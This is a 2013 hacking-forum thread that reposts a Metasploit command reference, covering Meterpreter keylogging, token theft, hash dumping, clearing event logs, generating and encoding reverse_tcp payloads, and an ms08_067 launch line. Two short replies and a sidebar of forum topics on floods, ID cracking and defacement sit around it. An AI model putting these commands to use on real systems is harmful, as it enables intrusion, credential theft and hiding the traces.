๑۩۞۩๑FreebuzZ๑۩۞۩๑
hi GUEST!!!!!!!!!!!

Welcome to FreeBuzz Team

Please register to have full access to the forum and be able to download stuff., stay with us..
lotfan baraye estefade az in anjoman site sabtenam konid baraye sabtenam kare shakhi lazem ni bokoni faghat miazni register sabtenam mikoni niazi be linke activate az email nis bad login mikoni
cheers
FreeBuzZ TeaM !

Bl4ck W4rning
๑۩۞۩๑FreebuzZ๑۩۞۩๑
hi GUEST!!!!!!!!!!!

Welcome to FreeBuzz Team

Please register to have full access to the forum and be able to download stuff., stay with us..
lotfan baraye estefade az in anjoman site sabtenam konid baraye sabtenam kare shakhi lazem ni bokoni faghat miazni register sabtenam mikoni niazi be linke activate az email nis bad login mikoni
cheers
FreeBuzZ TeaM !

Bl4ck W4rning
๑۩۞۩๑FreebuzZ๑۩۞۩๑
Would you like to react to this message? Create an account in a few clicks or log in to continue.

๑۩۞۩๑FreebuzZ๑۩۞۩๑

๑۩۞۩๑aTTack۩ Defece۩Code۩ Security۩ Anonymous Hackers۩ FreeBuzz Team ๑۩۞۩๑
 
HomeSearchLatest imagesRegisterLog in
Latest topics
» سلام علیک و رحمه الله...چه خبرا بچه ها؟
دستورات کامل msf  Icon_minitimeby DARK Sat Apr 30, 2022 11:59 pm

» oon ghadima!!!
دستورات کامل msf  Icon_minitimeby Inj3ctor Wed Aug 18, 2021 4:26 am

» need a source code of any server for university project help me for it
دستورات کامل msf  Icon_minitimeby xerockss Sun Jun 09, 2019 10:28 pm

» New : Run Python based bots like Aurora, Blacksmith, VBOt in your Android Mobile
دستورات کامل msf  Icon_minitimeby ltc_mkt Wed Feb 27, 2019 5:09 pm

» دوره ی اضافه کردن سکه به برنامه هایی همچون فالوور بگیر و ممبرگیر و ... (خریداری شده)
دستورات کامل msf  Icon_minitimeby mr.pitza Mon Oct 01, 2018 8:10 pm

» hach any id f.a.c.e.b.o.o.k 2019
دستورات کامل msf  Icon_minitimeby christian777 Sat Apr 21, 2018 4:41 am

» هديه للجميع 500 نك فلوود قديم شغالين 500 old ids flood free
دستورات کامل msf  Icon_minitimeby christian777 Mon Apr 09, 2018 6:37 pm

» Freebuzz & Nimbuzz yadet bekheyr !
دستورات کامل msf  Icon_minitimeby DARK Thu Apr 05, 2018 1:54 pm

» new flood 2018 فلود جديد يعمل على جميع انواع نكات لفلود القديمة والجديدة
دستورات کامل msf  Icon_minitimeby christian777 Fri Oct 20, 2017 6:20 am

» STEALTH PROJECT WEB FLOOD NIMBUZZ
دستورات کامل msf  Icon_minitimeby djsaim Sat Sep 30, 2017 8:51 pm

» XIO server & online bots
دستورات کامل msf  Icon_minitimeby ltc_mkt Mon May 29, 2017 8:12 pm

» فریباز دوباره برمیگردد
دستورات کامل msf  Icon_minitimeby Mer+sad Thu Apr 06, 2017 3:34 am

» Xio Server Updated Elite Version
دستورات کامل msf  Icon_minitimeby lekshmi321 Wed Mar 29, 2017 11:35 am

» Join MulTi id nimbuzz 2016
دستورات کامل msf  Icon_minitimeby sami-alarifi Mon Dec 05, 2016 3:09 am

» انجمن تیم امنیتی آنانیموس سکوریتی
دستورات کامل msf  Icon_minitimeby shirsefat Thu Nov 17, 2016 6:12 pm

» Xio Server Latest Version
دستورات کامل msf  Icon_minitimeby shirsefat Thu Nov 17, 2016 6:04 pm

» amooZesh kamele hack dar yek file pdf
دستورات کامل msf  Icon_minitimeby shirsefat Fri Nov 11, 2016 2:23 am

» CRACKER IDS 2017 WORKING
دستورات کامل msf  Icon_minitimeby abdo-osmana Sat Oct 29, 2016 1:43 am

» NEW ... ROOM ANTI CAPCHA 2017 DESTROY ROOMS V 4 BY AL-JOOOCKER@N.C
دستورات کامل msf  Icon_minitimeby abdo-osmana Sat Oct 29, 2016 1:41 am

» NEW FLOOD ROOM AND PV 2017 ANTI CAPTCHA
دستورات کامل msf  Icon_minitimeby abdo-osmana Sat Oct 29, 2016 1:30 am

» add new server Work 24 hours --- تحديث حسابات السيرفرات قم بــاضافه السيرفرات الجديده تعمل 24 ساعه
دستورات کامل msf  Icon_minitimeby abdo-osmana Sat Oct 29, 2016 1:28 am

» new auto id maker
دستورات کامل msf  Icon_minitimeby sandy_rawat Tue Oct 04, 2016 4:24 pm

» wonderful list id arbic for crucker اكبر ليستة ايملات تخمين جديدة
دستورات کامل msf  Icon_minitimeby christian777 Sun Sep 25, 2016 12:59 am

» New Abdo Cobra Auto Id maker Source code working
دستورات کامل msf  Icon_minitimeby Kash007 Sat Sep 24, 2016 10:26 pm

» 2000 id flood free
دستورات کامل msf  Icon_minitimeby christian777 Sun Sep 18, 2016 3:54 am

» new ip address changer with crack@pishaash@n.c
دستورات کامل msf  Icon_minitimeby cebecis Sat Sep 10, 2016 3:19 am

» تجسس على الخصوصية
دستورات کامل msf  Icon_minitimeby majed5160 Thu Aug 25, 2016 3:26 am

» سلام دوستان من
دستورات کامل msf  Icon_minitimeby majed5160 Wed Aug 24, 2016 3:10 am

» Trusted online server bots
دستورات کامل msf  Icon_minitimeby bom Fri Aug 19, 2016 7:59 pm

» فلود جديد ناررررر
دستورات کامل msf  Icon_minitimeby christian777 Sat Aug 13, 2016 10:12 am

» Receive Captcha in PVT C# and VB.NET source code available
دستورات کامل msf  Icon_minitimeby wathk Thu Jul 28, 2016 3:01 am

» Attention nimbuzz users !
دستورات کامل msf  Icon_minitimeby -namakul- Tue Jul 26, 2016 8:27 pm

» Salam man az karbqraye qadimiton hastam lotfan komakam konid :(
دستورات کامل msf  Icon_minitimeby SALIJON* Sat Jul 23, 2016 6:34 pm

» Nimbuzz stylish ids for sale
دستورات کامل msf  Icon_minitimeby msb Wed Jul 20, 2016 12:33 pm

» Nuke Mobileserver V9
دستورات کامل msf  Icon_minitimeby launchar Tue Jul 19, 2016 1:51 pm

» help me please c sharp masters
دستورات کامل msf  Icon_minitimeby launchar Tue Jul 19, 2016 1:39 pm

» salam be dostane qadimi hamgi join bedin bebinm kojain :P
دستورات کامل msf  Icon_minitimeby ghaz_ghaz90 Sat Jul 09, 2016 12:22 am

» Xio Server Update
دستورات کامل msf  Icon_minitimeby ghaz_ghaz90 Fri Jul 08, 2016 11:15 pm

» Xio Auto Capcha ID Maker ( FASTEST IDMAKER EVER)
دستورات کامل msf  Icon_minitimeby karthik~ajay Thu Jul 07, 2016 10:59 pm

» All web defacers and SQLi hach
دستورات کامل msf  Icon_minitimeby mitu143 Thu Jun 16, 2016 1:24 pm

» special daface pages FreeBuzz-Team
دستورات کامل msf  Icon_minitimeby mitu143 Thu Jun 16, 2016 12:59 pm

» Meet A Stranger Room Advertizer BoT
دستورات کامل msf  Icon_minitimeby lekshmi321 Sun Jun 05, 2016 5:14 pm

» NEW STEALTH PROJECT WEB FLOOD NIMBUZZ
دستورات کامل msf  Icon_minitimeby gentarbumi Sun Apr 24, 2016 10:08 pm

» Moving the write using HTML تحريك الكتابة باستخدام جافا سكرييت
دستورات کامل msf  Icon_minitimeby faris.jra7 Sat Apr 23, 2016 11:40 pm

» فلود غرف النيمباز
دستورات کامل msf  Icon_minitimeby saeid Sat Apr 16, 2016 12:43 am

» How to Show Hidden Files and Folders In Windows 7
دستورات کامل msf  Icon_minitimeby i_am~the_best Fri Apr 15, 2016 8:45 am

» How to Earn Money Online From PTC Sites
دستورات کامل msf  Icon_minitimeby i_am~the_best Fri Apr 15, 2016 8:43 am

» Create Id and Chat
دستورات کامل msf  Icon_minitimeby star.iraq Sun Apr 10, 2016 2:51 pm

» Addlist DC + hanger + remote v2.0
دستورات کامل msf  Icon_minitimeby oye Tue Apr 05, 2016 9:18 am

» XIO ADD FLOOD V.2
دستورات کامل msf  Icon_minitimeby lekshmi321 Fri Mar 25, 2016 8:37 pm

Search
 
 

Display results as :
 
Rechercher Advanced Search
Keywords
change hidden flooder visual bigwizard shrek Freebuzz amozesh famous mashkook source 2017 changer socket ehsan maziar prime info star Quiz code hexagora Jabber allstar bombotmod groupchat
Frb Upload Center



 

 دستورات کامل msf

Go down 
3 posters
AuthorMessage
shirsefat
T-SBD
T-SBD
shirsefat


Posts : 130
Points : 1197
Thanked : 12
Join date : 2013-03-02
ASL : hacker-iranian@n.c rem0ved New id shirsefat@n.c Reza 20 l0r anjeles Sarbaz 19/10/1392 ezam be khdmat
Nimbuzz Id : shirsefat

دستورات کامل msf  Empty
PostSubject: دستورات کامل msf    دستورات کامل msf  Icon_minitimeTue May 14, 2013 12:33 pm

This is a reference for the most frequently used commands and syntax within Metasploit’s various interfaces and utilities.

MSFconsole Commands:

Select All
Code:
show exploits
Show all exploits within the Framework.

Select All
Code:
show payloads
Show all payloads within the Framework.

Select All
Code:
show auxiliary
Show all auxiliary modules within the Framework.


Select All
Code:
search name
Search for exploits or modules within the Framework.

Select All
Code:
info
Load information about a specific exploit or module.

Select All
Code:
use name
Load an exploit or module (example: use windows/smb/.....).

Select All
Code:
LHOST
Your local host’s IP address reachable by the target, often the public IP address when not on a local network. Typically used for reverse shells.

Select All
Code:
RHOST
The remote host or the target.

Select All
Code:
set function
Set a specific value (for example, LHOST or RHOST).

Select All
Code:
setg function
Set a specific value globally (for example, LHOST or RHOST).

Select All
Code:
show options
Show the options available for a module or exploit.

Select All
Code:
show targets
Show the platforms supported by the exploit.

Select All
Code:
set target num
Specify a specific target index if you know the OS and service pack.

Select All
Code:
set payload payload
Specify the payload to use.

Select All
Code:
show advanced
Show advanced options.

Select All
Code:
set autorunscript migrate -f
Automatically migrate to a separate process upon exploit completion.

Select All
Code:
check
Determine whether a target is vulnerable to an attack.

Select All
Code:
exploit
Execute the module or exploit and attack the target.exploit -j
Run the exploit under the context of the job. (This will run the exploit in the background.)

Select All
Code:
exploit -z
Do not interact with the session after successful exploitation.

Select All
Code:
exploit -e encoder
Specify the payload encoder to use (example: exploit –e shikata_ga_nai).

Select All
Code:
exploit -h
Display help for the exploit command.

Select All
Code:
sessions -l
List available sessions (used when handling multiple shells).

Select All
Code:
sessions -l -v
List all available sessions and show verbose fields, such as which vulnerability was used when exploiting the system.

Select All
Code:
sessions -s script
Run a specific Meterpreter script on all Meterpreter live sessions.

Select All
Code:
sessions -K
Kill all live sessions.

Select All
Code:
sessions -c cmd
Execute a command on all live Meterpreter sessions.

Select All
Code:
sessions -u sessionID
Upgrade a normal Win32 shell to a Meterpreter console.

Select All
Code:
db_create name
Create a database to use with database-driven attacks (example: db_create autopwn).

Select All
Code:
db_connect name
Create and connect to a database for driven attacks (example: db_connect autopwn).

Select All
Code:
db_nmap
Use nmap and place results in database. (Normal nmap syntax is supported, such as –sT –v –P0.)

Select All
Code:
db_autopwn -h
Display help for using db_autopwn.

Select All
Code:
db_autopwn -p -r -e
Run db_autopwn against all ports found, use a reverse shell, and exploit all systems.

Select All
Code:
db_destroy
Delete the current database.

Select All
Code:
db_destroy user:password@host:p.o.r.t/database
Delete database using advanced options.

Meterpreter Commands help:
Open Meterpreter usage help.

Select All
Code:
run scriptname
Run Meterpreter-based scripts; for a full list check the scripts/meterpreter directory.

Select All
Code:
sysinfo
Show the system information on the compromised target.

Select All
Code:
ls
List the files and folders on the target.

Select All
Code:
use priv
Load the privilege extension for extended Meterpreter libraries.

Select All
Code:
ps
Show all running processes and which accounts are associated with each process.

Select All
Code:
migrate PID
Migrate to the specific process ID (PID is the target process ID gained from the ps command).

Select All
Code:
use incognito
Load incognito functions. (Used for token stealing and impersonation on a target machine.)

Select All
Code:
list_tokens -u
List available tokens on the target by user.

Select All
Code:
list_tokens -g
List available tokens on the target by group.

Select All
Code:
impersonate_token DOMAIN_NAME\\USERNAME
Impersonate a token available on the target.

Select All
Code:
steal_token PID
Steal the tokens available for a given process and impersonate that token.drop_token Stop impersonating the current token.

Select All
Code:
getsystem
Attempt to elevate permissions to SYSTEM-level access through multiple attack vectors.

Select All
Code:
shell
Drop into an interactive shell with all available tokens.

Select All
Code:
execute -f cmd.exe -i
Execute cmd.exe and interact with it.

Select All
Code:
execute -f cmd.exe -i -t
Execute cmd.exe with all available tokens.

Select All
Code:
execute -f cmd.exe -i -H -t
Execute cmd.exe with all available tokens and make it a hidden process.

Select All
Code:
rev2self
Revert back to the original user you used to compromise the target.

Select All
Code:
reg command
Interact, create, delete, query, set, and much more in the target’s registry.

Select All
Code:
setdesktop number
Switch to a different screen based on who is logged in.

Select All
Code:
screenshot
Take a screenshot of the target’s screen.

Select All
Code:
upload file
Upload a file to the target.

Select All
Code:
download file
Download a file from the target.

Select All
Code:
keyscan_start
Start sniffing keystrokes on the remote target.

Select All
Code:
keyscan_dump
Dump the remote keys captured on the target.

Select All
Code:
keyscan_stop
Stop sniffing keystrokes on the remote target.

Select All
Code:
getprivs
Get as many privileges as possible on the target.

Select All
Code:
uictl enable keyboard/mouse
Take control of the keyboard and/or mouse.

Select All
Code:
background
Run your current Meterpreter shell in the background.

Select All
Code:
hashdump
Dump all hashes on the target.

Select All
Code:
use sniffer
Load the sniffer module.

Select All
Code:
sniffer_interfaces
List the available interfaces on the target.

Select All
Code:
sniffer_dump interfaceID pcapname
Start sniffing on the remote target.

Select All
Code:
sniffer_start interfaceID packet-buffer
Start sniffing with a specific range for a packet buffer.

Select All
Code:
sniffer_stats interfaceID
Grab statistical information from the interface you are sniffing.

Select All
Code:
sniffer_stop interfaceID
Stop the sniffer.

Select All
Code:
add_user username password -h ip
Add a user on the remote target.

Select All
Code:
add_group_user "Domain Admins" username -h ip
Add a username to the Domain Administrators group on the remote target.

Select All
Code:
clearev
Clear the event log on the target machine.

Select All
Code:
timestomp
Change file attributes, such as creation date (antiforensics measure).

Select All
Code:
reboot
Reboot the target machine.

MSFpayload Commands:

Select All
Code:
msfpayload -h
List available payloads.

Select All
Code:
msfpayload windows/meterpreter/bind_tcp O
List available options for the windows/meterpreter/bind_tcp payload (all of these can use any payload).

Select All
Code:
msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.5 LPORT=443 X > payload.exe
Create a Meterpreter reverse_tcp payload to connect back to 192.168.1.5 and on p.o.r.t 443, and then save it as a Windows Portable Executable named payload.exe.

Select All
Code:
msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.5 LPORT=443 R > payload.raw
Same as above, but export as raw format. This will be used later in msfencode

Select All
Code:
msfpayload windows/meterpreter/bind_tcp LPORT=443 C > payload.c
Same as above but export as C-formatted shellcode.

Select All
Code:
msfpayload windows/meterpreter/bind_tcp LPORT=443 J > payload.java
Export as %u encoded JavaScript.

MSFencode Commands:

Select All
Code:
msfencode -h
Display the msfencode help.

Select All
Code:
msfencode -l
List the available encoders.

Select All
Code:
msfencode -t (c, elf, exe, java, js_le, js_be, perl, raw, ruby, vba, vbs, loop-vbs, asp, war, macho)
Format to display the encoded buffer.

Select All
Code:
msfencode -i payload.raw -o encoded_payload.exe -e x86/shikata_ga_nai -c 5 -t exe
Encode payload.raw with shikata_ga_nai five times and export it to an output file named encoded_payload.exe.

Select All
Code:
msfpayload windows/meterpreter/bind_tcp LPORT=443 R | msfencode -e x86/ _countdown -c 5 -t raw | msfencode -e x86/shikata_ga_nai -c 5 -t exe -o multi-encoded_payload.exe
Create a multi-encoded payload.

Select All
Code:
msfencode -i payload.raw BufferRegister=ESI -e x86/alpha_mixed -t c
Create pure alphanumeric shellcode where ESI points to the shellcode; output in C-style notation.

MSFcli Commands:

Select All
Code:
msfcli | grep exploit
Show only exploits.

Select All
Code:
msfcli | grep exploit/windows
Show only Windows exploits.

Select All
Code:
msfcli exploit/windows/smb/ms08_067_netapi PAYLOAD=windows/meterpreter/bind_tcp LPORT=443 RHOST=172.16.32.142 E
Launch ms08_067_netapi exploit at 172.16.32.142 with a bind_tcp payload being delivered to listen on p.o.r.t 443
Back to top Go down
http://star-team.orq.ir
mohammad
FreeBuzz Team
FreeBuzz Team
mohammad


Posts : 2177
Points : 17268
Thanked : 39
Join date : 2013-02-24
ASL : mohammad
Nimbuzz Id : parwardgara@n.c

دستورات کامل msf  Empty
PostSubject: Re: دستورات کامل msf    دستورات کامل msf  Icon_minitimeTue May 14, 2013 5:56 pm

mishe yeki tozih bede be che kari miad ini ke reza dade?mix
Back to top Go down
http://hamneshini.blogsky.com
lvlr.sandelfon
T-SBD
T-SBD
lvlr.sandelfon


Posts : 346
Points : 486
Thanked : 0
Join date : 2012-06-27
ASL : lvlr.sandelfon

دستورات کامل msf  Empty
PostSubject: Re: دستورات کامل msf    دستورات کامل msf  Icon_minitimeWed May 15, 2013 8:34 pm

msf hamun metasploite ke sazgarie bishtari tu linux dare behtar bud beja bind tcp az reverse_tcp estefade mikardi
exploite netapi dg ro porte 445 javab nemide
aksare payloada ham masalan meterpreter ejra nemishe ru systeme ba kuchiktarin firewall
Back to top Go down
Sponsored content





دستورات کامل msf  Empty
PostSubject: Re: دستورات کامل msf    دستورات کامل msf  Icon_minitime

Back to top Go down
 
دستورات کامل msf
Back to top 
Page 1 of 1
 Similar topics
-
» آموزش کامل دستورات cmd
» special daface pages FreeBuzz-Team
» لیست کامل تمامی دستورات قابل اجرا از طریق Run
» دانلود pdf دستورات cmd.
» مشخصات کامل یک آی پی آدرس

Permissions in this forum:You cannot reply to topics in this forum
๑۩۞۩๑FreebuzZ๑۩۞۩๑ :: Free Area :: امنیت سیستم های شخصی-
Jump to: